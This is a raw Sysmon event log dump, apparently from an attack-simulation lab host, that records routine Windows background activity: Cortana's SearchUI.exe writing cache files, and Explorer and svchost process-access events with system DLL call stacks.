13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011331Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_14[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011330Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011329Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_13[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011328Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011327Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_12[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011326Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011325Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_11[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011324Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011323Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.170{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_10[1].txt2021-01-14 13:30:11.170 11241100x800000000000000011322Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011321Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011320Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011319Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_8[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011318Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011317Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_7[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011316Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011315Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_6[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011314Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011313Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_5[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011312Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011311Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_4[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011310Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011309Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_3[1].txt2021-01-14 13:30:11.154 11241100x800000000000000011308Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.154{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt2021-01-14 13:30:11.139 11241100x800000000000000011307Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.139{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\AppCache\UNBDVR11\1\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_2[1].txt2021-01-14 13:30:11.139 10341000x800000000000000011306Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.123{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+6446|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011305Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.123{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9c27|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9b25|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+63fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011304Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.123{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a54|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9af1|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+63fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011303Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.123{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9ac5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+63fd|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011302Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.123{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9c27|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9b25|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+4aab|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011301Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.123{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9a54|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9af1|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+4aab|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e 10341000x800000000000000011300Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.123{08A6967A-4754-6000-1705-000000009A01}34082572C:\Windows\Explorer.EXE{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+8fcc|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+9ac5|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+4aab|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+703f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+74e0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+7c5e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c40e 10341000x800000000000000011299Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.045{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011298Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.045{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011297Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.045{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011296Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.045{08A6967A-4287-6000-0C00-000000009A01}5883124C:\Windows\system32\svchost.exe{08A6967A-4288-6000-1000-000000009A01}1136C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011295Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 